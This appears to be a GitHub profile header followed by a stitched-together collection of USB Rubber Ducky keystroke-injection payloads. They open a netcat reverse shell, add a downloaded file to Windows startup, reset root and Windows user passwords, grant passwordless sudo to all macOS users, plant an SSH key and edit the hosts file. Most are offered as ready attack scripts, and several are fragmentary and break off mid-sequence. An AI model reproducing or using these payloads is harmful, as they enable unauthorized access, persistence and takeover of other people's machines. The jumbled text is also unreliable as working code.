🔥
Working from SapsLab

Jonny Banana JonnyBanana

  • SappohSamaWorkshop - Circuit Circus
  • Bologna - Italy
REM Get a reverse shell using ncat.
REM Run `nc -l 9999` to wait for the reverse shell.
REM Make sure to update the hostname before using it.
DELAY 1000
ALT F2
DELAY 100
STRING sh -c "nc -e /bin/bash eternal-pickle 9999"
REM Delay to make it work in KDE. Not sure why that's necessary.
DELAY 100
REM Target OS: Windows 7, Not yet tested on 10 or 8
REM Change the 'DIRECTFILEURL' to a direct download link to your file. I recommend using Google Drive and going to this website to make
REM them a direct download link: https://sites.google.com/site/gdocs2direct/
REM This works by downloading the file via Internet Explorer then confirming the download. After that it creates a shortcut for the file
REM you uploaded and puts it in the shell:startup for the computer.
REM Also remember to replace 'FILENAMEHERE' with the name of your file so it can create the shortcut.
REM You may change the delays depending on how fast the target computer is.
REM Made By: TheUnkown
GUI r
DELAY 1000
REM Password Stealing script by TylerTechNZ
REM
REM --> Create Obfuscated CMD
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING MODE 20,1
REM Resetting Password on Ubuntu
CTRL ALT DELETE
STRING reboot
DELAY 10000
SHIFT
ENTER
ENTER
STRING mount -o rw,remount /
STRING passwd root
REM This payload will remove the current users password on windows and give you keys to the kingdom
GUI r
STRING cmd
ENTER
DELAY 500
REM It is important that you change to the target username below, will continue to work on copy/pasting from cmd prompt
STRING net user USERNAME HERE ""
REM MacOS AllSudo
REM Enables Sudo access for all users without a password
REM First boot the machine into single user mode - https://support.apple.com/en-us/HT201573
REM By Jesse Wallace (@c0deous)
REM https://c0deo.us/
DELAY 1000
STRING mount -uw / && chmod 755 /etc/sudoers && echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && chmod 440 /etc/sudoers && shutdown -h now
ENTER
REM Now would be a great time to install a backdoor. Ez root ;3
REM TODO Use visudo for edits (unconfirmed if working)
REM This script adds a ssh public key to the authorized_keys file on a target's mac.
DELAY 1000
COMMAND SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 800
STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys
DELAY 1000
GUI SPACE
STRING terminal
DELAY 1000
ENTER
DELAY 250
STRING say fuck off asshole
ENTER
GUI N
DELAY 250
REM A script to create a local DNS entry in the host file of a mac.
REM change the example.com to any site you want.
REM change the 127.0.0.1 to any ip you want.
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
ENTER
STRING nano /private/etc/hosts
ENTER